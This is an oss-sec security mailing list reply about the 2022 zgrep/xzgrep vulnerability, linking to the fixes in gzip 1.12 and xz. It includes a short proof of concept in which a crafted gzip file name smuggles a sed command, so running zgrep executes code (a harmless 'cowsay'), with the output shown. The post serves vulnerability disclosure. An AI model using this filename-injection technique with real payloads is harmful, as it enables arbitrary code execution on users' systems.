oss-sec mailing list archives
Re: zgrep, xzgrep: arbitrary-file-write vulnerability
From: Jakub Wilk <jwilk () jwilk net>
Date: Fri, 8 Apr 2022 10:23:29 +0200
* Jim Meyering <jim () meyering net>, 2022-04-07, 11:44:
All previous versions of gzip and xzutils are affected. xzutils released this patch today: https://tukaani.org/xz/xzgrep-ZDI-CAN-16587.patch https://tukaani.org/xz/xzgrep-ZDI-CAN-16587.patch.sig gzip-1.12 was released today, with the fix: https://lists.gnu.org/r/bug-gzip/2022-04/msg00011.html https://ftp.gnu.org/gnu/gzip/gzip-1.12.tar.xz https://ftp.gnu.org/gnu/gzip/gzip-1.12.tar.xz.sig
As mentioned in the xz patch, if you have GNU sed, you get not just file write, but direct code execution.
PoC: $ touch foo.gz $ echo foo | gzip > "$(printf '|\n;e cowsay pwned\n#.gz')" $ zgrep foo *.gz _______ < pwned > ------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || foo -- Jakub Wilk
Current thread:
- zgrep, xzgrep: arbitrary-file-write vulnerability Jim Meyering (Apr 07)
- Re: zgrep, xzgrep: arbitrary-file-write vulnerability Jakub Wilk (Apr 08)
- Re: zgrep, xzgrep: arbitrary-file-write vulnerability Axel Beckert (Apr 08)
- Re: zgrep, xzgrep: arbitrary-file-write vulnerability Levente Polyak (Apr 08)
- Re: zgrep, xzgrep: arbitrary-file-write vulnerability Jakub Wilk (Apr 08)